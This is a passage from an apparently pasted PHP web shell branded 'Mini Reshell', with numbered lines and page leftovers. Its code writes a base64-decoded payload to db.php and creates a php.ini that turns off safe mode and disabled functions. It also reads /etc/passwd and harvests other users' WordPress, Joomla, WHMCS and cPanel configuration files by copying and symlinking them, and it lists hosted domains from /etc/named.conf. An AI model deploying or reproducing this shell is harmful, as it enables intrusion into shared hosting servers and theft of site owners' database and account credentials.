TFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
  834.         file_put_contents("db.php",base64_decode($script));
  835.          echo "<script>alert('done! check db.php'); hideAll();</script>";
  836.         echo "<p><center><font color=green>Check = >> <a href='db.php' target=_blank><b>db.php</b></a></font></center>
  837.  
  838.         </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  839.         <br><center>$nick Mini Reshell</center> ";
  840.         die();
  841.         }
  842. //create php.ini for safe mode
  843.         elseif ( $pilih == 'phini') {
  844.         $byht = "safe_mode = Off
  845.         disable_functions = None
  846.         safe_mode_gid = OFF
  847.         open_basedir = OFF
  848.         allow_url_fopen = On";
  849.         file_put_contents("php.ini",$byht);
  850.         echo "<script>alert('php.ini Created'); hideAll();</script>";
  851.         echo "
  852.         </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  853.         <br><center>$nick Mini Reshell</center> ";
  854.    
  855.         die();
  856.         }
  857.  
  858.     }
  859.     }
  860.     ?>
  861.  
  862.    
  863.    
  864.    <?php
  865. //itachi quotes
  866.     if(isset($_GET['beby']) && ($_GET['beby'] == 'quotes')){
  867. ?>
  868.  
  869. <br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Itachi Quotes </th></tr><td>
  870. Kita Tidak Tahu Orang Seperti Apa Kita Sebenarnnya, Sampai Di Saat Detik-Detik Kematian Kita Tiba....<br>Saat Itulah Kita Akan Tahu Orang Seperti Apa Kita Sebenarnya !!
  871. </td></tr></table>
  872.  
  873.  
  874. <?php
  875. }
  876. //contfig grabber
  877. if(isset($_GET['beby']) && ($_GET['beby'] == 'config'))
  878. {
  879. ?>
  880. <form action="?beby=config" method="post">
  881. <br>
  882.  
  883. <form method=post><font color=white size=2>Create php.ini</font><p>
  884. <input type=submit name=ini value="use to Generate PHP.ini" /></p></form>
  885. <form method=post><font color=white size=2>Config Grabb</font><p>
  886. <input type=submit name="idx" value="use to Extract Config" /></p></form>
  887. <form method=post><font color=white size=2>Search Username</font><p>
  888. <input type=submit name="usre" value="use to Extract usernames" /></p></form>
  889.  
  890.  
  891. <?php
  892. //php.ini
  893. if(isset($_POST['ini']))
  894. {
  895. $r=fopen('php.ini','w');
  896. $rr="safe_mode=OFF
  897. disable_functions=NONE";
  898. fwrite($r,$rr);
  899. $link="<a href=php.ini><font color=white size=2><u>buka di newtab PHP.INI</u></font></a>";
  900. echo $link;
  901. }
  902. ?>
  903.  
  904. <?php
  905.  
  906. if(isset($_POST['idx']))
  907. {
  908. $etc = fopen("/etc/passwd", "r");
  909.     $idx = mkdir("idx_config", 0777);
  910.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  911.     $htc = fopen("idx_config/.htaccess","w");
  912.     fwrite($htc, $isi_htc);
  913.     while($passwd = fgets($etc)) {
  914.         if($passwd == "" || !$etc) {
  915.             echo "<font color=red>Can't read /etc/passwd</font>";
  916.         } else {
  917.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  918.             foreach($user_config[1] as $user_idx) {
  919.                 $user_config_dir = "/home/$user_idx/public_html/";
  920.                 if(is_readable($user_config_dir)) {
  921.                     $grab_config = array(
  922.                         "/home/$user_idx/.my.cnf" => "cpanel",
  923.                         "/home/$user_idx/.accesshash" => "WHM-accesshash",
  924.                         "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  925.                         "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  926.                         "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  927.                         "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  928.                         "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  929.                         "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  930.                         "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  931.                         "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  932.                         "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  933.                         "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  934.                         "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  935.                         "/home/$user_idx/public_html/configuration.php" => "Joomla",
  936.                         "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  937.                         "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  938.                         "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  939.                         "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  940.                         "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  941.                         "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  942.                     foreach($grab_config as $config => $nama_config) {
  943.                         $ambil_config = file_get_contents($config);
  944.                         if($ambil_config == '') {
  945.                         } else {
  946.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  947.                             fputs($file_config,$ambil_config);
  948.                         }
  949.                     }
  950.                 }      
  951.             }
  952.         }  
  953.     }
  954.     $path = getcwd();
  955.    
  956.     echo "<center>Done Grabb <a href='?beby=exploler&path=$path$dir/idx_config'><font color=lime>Click Here</font></a></center>";
  957.     }
  958. ?>
  959.  
  960.  
  961. <?php
  962. //user
  963. if(isset($_POST['usre'])){
  964. ?><form method=post>
  965.  
  966. <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
  967. foreach($users as $user)
  968. {
  969. $str=explode(":",$user);
  970. echo $str[0]."\n";
  971. }
  972. ?></textarea>
  973. <br><br>
  974.  
  975. <input type=submit name=su value="Grabber Now !!" /></form>
  976.  
  977. <?php } ?>
  978.  
  979. <?php
  980. //config
  981. error_reporting(0);
  982. if(isset($_POST['su']))
  983. {
  984. mkdir('x48',0777);
  985. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  986. $g = fopen('x48/.htaccess','w');
  987. fwrite($g,$rr);
  988. $hkc = symlink("/","hkc/root");
  989. $rt="<a href=x48/root><font color=white> Boxed haha</font></a>";
  990. echo "See for folder symlink <br><u>$rt</u>";
  991. $dir=mkdir('x48',0777);
  992. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  993. $f = fopen('x48/.htaccess','w');
  994. fwrite($f,$r);
  995. $consym="<a href=x48/><font color=white>Configuration</font></a>";
  996. echo "<br>Result<br><u><font color=red>$consym</font></u>";
  997. $usr=explode("\n",$_POST['user']);
  998. $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
  999. foreach($usr as $uss )
  1000. {
  1001. $us=trim($uss);
  1002. foreach($configuration as $c)
  1003. {
  1004. $rs="/home/".$us."/public_html/".$c;
  1005. $r="hkc/".$us." .. ".$c;
  1006. symlink($rs,$r);
  1007. }
  1008. }
  1009. }
  1010. }
  1011. ?>
  1012.  
  1013.  
  1014. <?php
  1015. //domain viewer
  1016.   if(isset($_GET['beby']) && ($_GET['beby'] == 'domain'))
  1017. {
  1018. ?>
  1019. <form action="?beby=domain" method="post">
  1020. <?php
  1021. //radable public_html
  1022. echo "<br><br>";
  1023. $file = @implode(@file("/etc/named.conf"));
  1024. if(!$file){ die("<font color='green'># can't ReaD -> [ /etc/named.conf ]    </font>
  1025.    
  1026.     </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  1027.         <br><center>$nick Mini Reshell</center>
  1028.          "); }
  1029. preg_match_all("#named/(.*?).db#",$file ,$r);
  1030. $domains = array_unique($r[1]);
  1031. function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1032. check();
  1033. echo '  <center>
  1034.      [+] Here We Have : [<font style=color:#00FF00>".count($domains)."</font>] Listed Domains In localhost.</center>
  1035.        <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><td style="background:darkred;color:white;text-align:center;"><b>List Of Users</b></td> <td style="background:darkred;color:white;text-align:center;border-left:1px solid white;"> <b><font style=color:#F80;List Of Domains</b></td></tr> ';
  1036. foreach($domains as $domain)
  1037.        {
  1038.        $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1039.        echo "<tr><td><a href='http://www.$domain' target='_blank' style='color:#00FF00;'>$domain</a></td><td style='border-left:1px solid white;'>".$user['name']."</td></tr>";
  1040.        }
  1041. echo "</table>";
  1042. //redable public_html
  1043. }
  1044.  
  1045. ?>
  1046.  
  1047.  
  1048.    
  1049.     </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By <?php echo $nick; ?></font></center><b>
  1050.         <br><center><?php echo $nick; ?> Mini Reshell</center>
  1051.        
  1052. <?php
  1053. //permision
  1054. function perms($file){
  1055. $perms = fileperms($file);
  1056.  
  1057. if (($perms & 0xC000) == 0xC000) {
  1058. // Socket
  1059. $info = 's';
  1060. } elseif (($perms & 0xA000) == 0xA000) {
  1061. // Symbolic Link
  1062. $info = 'l';
  1063. } elseif (($perms & 0x8000) == 0x8000) {
  1064. // Regular
  1065. $info = '-';
  1066. } elseif (($perms & 0x6000) == 0x6000) {
  1067. // Block special
  1068. $info = 'b';
  1069. } elseif (($perms & 0x4000) == 0x4000) {
  1070. // Directory
  1071. $info = 'd';
  1072. } elseif (($perms & 0x2000) == 0x2000) {
  1073. // Character special
  1074. $info = 'c';
  1075. } elseif (($perms & 0x1000) == 0x1000) {
  1076. // FIFO pipe
  1077. $info = 'p';
  1078. } else {
  1079. // Unknown
  1080. $info = 'u';
  1081. }
  1082.  
  1083. // Owner
  1084. $info .= (($perms & 0x0100) ? 'r' : '-');
  1085. $info .= (($perms & 0x0080) ? 'w' : '-');
  1086. $info .= (($perms & 0x0040) ?
  1087. (($perms & 0x0800) ? 's' : 'x' ) :
  1088. (($perms & 0x0800) ? 'S' : '-'));
  1089.  
  1090. // Group
  1091. $info .= (($perms & 0x0020) ? 'r' : '-');
  1092. $info .= (($perms & 0x0010) ? 'w' : '-');
  1093. $info .= (($perms & 0x0008) ?
  1094. (($perms & 0x0400) ? 's' : 'x' ) :
  1095. (($perms & 0x0400) ? 'S' : '-'));
  1096.  
  1097. // World
  1098. $info .= (($perms & 0x0004) ? 'r' : '-');
  1099. $info .= (($perms & 0x0002) ? 'w' : '-');
  1100. $info .= (($perms & 0x0001) ?
  1101. (($perms & 0x0200) ? 't' : 'x' ) :
  1102. (($perms & 0x0200) ? 'T' : '-'));
  1103.  
  1104. return $info;
  1105. }
  1106. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement